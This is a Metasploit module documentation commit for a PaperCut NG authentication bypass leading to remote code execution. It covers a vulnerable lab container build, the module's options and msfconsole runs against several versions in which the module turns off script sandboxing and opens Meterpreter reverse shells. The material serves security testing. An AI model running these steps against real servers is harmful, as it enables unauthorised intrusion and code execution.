Land #17936, PaperCutNG Authentication Bypass with RCE
This commit is contained in:
Christophe De La Fuente
@@ -0,0 +1,230 @@
|
||||
## Vulnerable Application
|
||||
### Description
|
||||
PaperCut NG Authentication Bypass affecting the below versions, see
|
||||
[confirmation](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps):
|
||||
- version 8.0.0 to 19.2.7 (inclusive)
|
||||
- version 20.0.0 to 20.1.6 (inclusive)
|
||||
- version 21.0.0 to 21.2.10 (inclusive)
|
||||
- version 22.0.0 to 22.0.8 (inclusive)
|
||||
|
||||
See module `info` for additional references.
|
||||
|
||||
### Building a Vulnerable Container
|
||||
Papercut NG can be run in a container. This is useful for creating test environments for verification. To acquire past versions of the
|
||||
software, i.e. known vulnerable versions, see [Download past/old PaperCut NG Versions](https://www.papercut.com/kb/Main/PastVersions).
|
||||
|
||||
Versions 16 and later include a "--non-interactive" switch, easing installation. Below I use podman on Centos 9 Stream to containerize the
|
||||
application for testing.
|
||||
|
||||
From an empty directory, create a Dockerfile containing the following:
|
||||
```dockerfile
|
||||
FROM almalinux
|
||||
RUN yum install -y procps-ng net-tools cpio sudo perl which
|
||||
RUN yum install -y initscripts
|
||||
RUN useradd -ms /bin/bash papercut
|
||||
RUN usermod -a -G wheel papercut
|
||||
RUN echo "papercut ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
|
||||
|
||||
COPY pcng-setup-*.sh /
|
||||
|
||||
USER papercut
|
||||
WORKDIR /home/papercut
|
||||
```
|
||||
|
||||
Download a vulnerable version. Build a container. Run the container while performing the installation.
|
||||
```sh
|
||||
curl -OJ "https://cdn.papercut.com/files/pcng/16.x/pcng-setup-16.4.39159-linux-x64.sh"
|
||||
podman build . --tag papercut-16.4.39159
|
||||
podman run -it --rm -p 9191:9191 localhost/papercut-16.4.39159 /bin/bash -c "sh /*.sh --non-interactive; read"
|
||||
```
|
||||
Note: *Be sure to cross reference the target version with the known vulnerable versions, as some of the links in the listed Past Versions
|
||||
are patched.*
|
||||
|
||||
A URL will be provided in the console to access the application, but you will likely need to use an IP accessible from your metasploit
|
||||
host, e.g. [127.0.0.1](http://127.0.0.1:9191/admin) in order to complete the application setup. After setup, you may commit changes to the
|
||||
container & tag the new image to maintain your configuration changes. In the future the service can be restarted using
|
||||
`/etc/init.d/papercut start` from within the container.
|
||||
|
||||
*Caveat: When first starting the server or after completing the installation, at least one user needs to login. I think this has something
|
||||
to do with getting the license manager into the correct state (i.e. loading the license). When this is not yet done then the Authentication
|
||||
Bypass is still functional leading to a "Target Vulnerable" message during `check`. However, when attempting to select the
|
||||
"\[Template Printer\]" a redirect to the About page occurs instead. Ensuring a logon can be done by using the "Login" button presented on
|
||||
the SetupCompleted page used for the bypass. This scenario is not covered in the module as it is unlikely to be an issue on any network
|
||||
that is currently in use.*
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
### TARGETURI
|
||||
|
||||
Path to the papercut application. Default is `/app`.
|
||||
|
||||
### HTTPDELAY
|
||||
|
||||
Number of seconds the web server will wait before termination. Default is 10.
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. `./msfconsole -q`
|
||||
2. `use multi/http/papercut_ng_auth_bypass`
|
||||
3. `set RHOSTS [target]`
|
||||
4. `run`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Linux x64 with PaperCut NG Version 22.0.8.65201
|
||||
```
|
||||
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
|
||||
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
|
||||
RHOSTS => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
|
||||
LHOST => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
|
||||
|
||||
[-] Handler failed to bind to 10.0.4.101:4444:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Bypass successful and created session: JSESSIONID=node0cwd0h7aut351pzjcifwvdyg25.node0
|
||||
[+] The target is vulnerable.
|
||||
[*] Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'
|
||||
[*] Setting server option 'print.script.sandboxed' to 'N') was 'Y'
|
||||
[*] Using URL: http://10.0.4.101:8080/rYrjrI0
|
||||
[*] Server started.
|
||||
[*] Sending payload for requested uri: /rYrjrI0.jar
|
||||
[*] Sending payload for requested uri: /rYrjrI0.jar
|
||||
[*] Sending stage (58851 bytes) to 10.0.2.100
|
||||
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:46224) at 2023-05-11 01:13:29 +0000
|
||||
[*] Server stopped.
|
||||
[*] rolling back 'print.script.sandboxed' to 'Y'
|
||||
[*] Setting server option 'print.script.sandboxed' to 'Y') was 'N'
|
||||
[*] rolling back 'print-and-device.script.enabled' to 'N'
|
||||
[*] Setting server option 'print-and-device.script.enabled' to 'N') was 'Y'
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
Note: Sandboxing is enabled by default in this version, scripting must be enabled and sandboxing must be disabled.
|
||||
|
||||
|
||||
### Tested on Linux x64 with PaperCut NG Version 19.2.7.62200
|
||||
```
|
||||
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
|
||||
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
|
||||
RHOSTS => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
|
||||
LHOST => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
|
||||
|
||||
[-] Handler failed to bind to 10.0.4.101:4444:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Bypass successful and created session: JSESSIONID=node01j4of6hup0i131vs585edo0uqb2.node0
|
||||
[+] The target is vulnerable.
|
||||
[*] Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'
|
||||
[*] Setting server option 'print.script.sandboxed' to 'N') was 'Y'
|
||||
[*] Using URL: http://10.0.4.101:8080/PWMM7S32xpRY7
|
||||
[*] Server started.
|
||||
[*] Sending payload for requested uri: /PWMM7S32xpRY7.jar
|
||||
[*] Sending payload for requested uri: /PWMM7S32xpRY7.jar
|
||||
[*] Sending stage (58851 bytes) to 10.0.2.100
|
||||
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:35072) at 2023-05-11 01:25:25 +0000
|
||||
[*] Server stopped.
|
||||
[*] Rolling back 'print.script.sandboxed' to 'Y'
|
||||
[*] Setting server option 'print.script.sandboxed' to 'Y') was 'N'
|
||||
[*] Rolling back 'print-and-device.script.enabled' to 'N'
|
||||
[*] Setting server option 'print-and-device.script.enabled' to 'N') was 'Y'
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
Note: Sandboxing is enabled by default in this version, scripting must be enabled and sandboxing must be disabled.
|
||||
|
||||
|
||||
### Tested on Linux x64 with PaperCut NG Version 18.3.9.49588d
|
||||
```
|
||||
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
|
||||
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
|
||||
RHOSTS => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
|
||||
LHOST => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
|
||||
|
||||
[-] Handler failed to bind to 10.0.4.101:4444:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Bypass successful and created session: JSESSIONID=node0re9f1cbww5v11qgrc7y4g9qv3.node0
|
||||
[+] The target is vulnerable.
|
||||
[*] Using URL: http://10.0.4.101:8080/o30YxAzAA69ISJ8
|
||||
[*] Server started.
|
||||
[*] Sending payload for requested uri: /o30YxAzAA69ISJ8.jar
|
||||
[*] Sending stage (58851 bytes) to 10.0.2.100
|
||||
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:40328) at 2023-05-11 02:29:15 +0000
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Tested on Linux x64 with PaperCut NG Version 16.4.39159
|
||||
```
|
||||
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
|
||||
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
|
||||
RHOSTS => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
|
||||
LHOST => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
|
||||
|
||||
[-] Handler failed to bind to 10.0.4.101:4444:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Bypass successful and created session: JSESSIONID=e79i55m6n77ex4p6ee3fu8u9
|
||||
[+] The target is vulnerable.
|
||||
[*] Using URL: http://10.0.4.101:8080/GuHN8K
|
||||
[*] Server started.
|
||||
[*] Sending payload for requested uri: /GuHN8K.jar
|
||||
[*] Sending stage (58851 bytes) to 10.0.2.100
|
||||
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:58324) at 2023-05-11 03:22:13 +0000
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
Note: The 'Form0' parameter for version 16 and lower does not take an additional '$Submit$1' value.
|
||||
|
||||
### Tested on Linux x64 with PaperCut NG Version 14.3.30457
|
||||
```
|
||||
msf6 > use exploit/multi/http/papercut_ng_auth_bypass
|
||||
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
|
||||
RHOSTS => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
|
||||
LHOST => 10.0.4.101
|
||||
msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
|
||||
|
||||
[-] Handler failed to bind to 10.0.4.101:4444:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Bypass successful and created session: JSESSIONID=b9g3gepapev0
|
||||
[+] The target is vulnerable.
|
||||
[*] Using URL: http://10.0.4.101:8080/kBXJNp
|
||||
[*] Server started.
|
||||
[*] Sending payload for requested uri: /kBXJNp.jar
|
||||
[*] Sending stage (58851 bytes) to 10.0.2.100
|
||||
[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:32852) at 2023-05-11 03:56:24 +0000
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
Note: Version 14, and possibly earlier, use a different HTML element to report the active version when exercising the vulnerable
|
||||
'SetupCompleted' page.
|
||||
Reference in New Issue
Block a user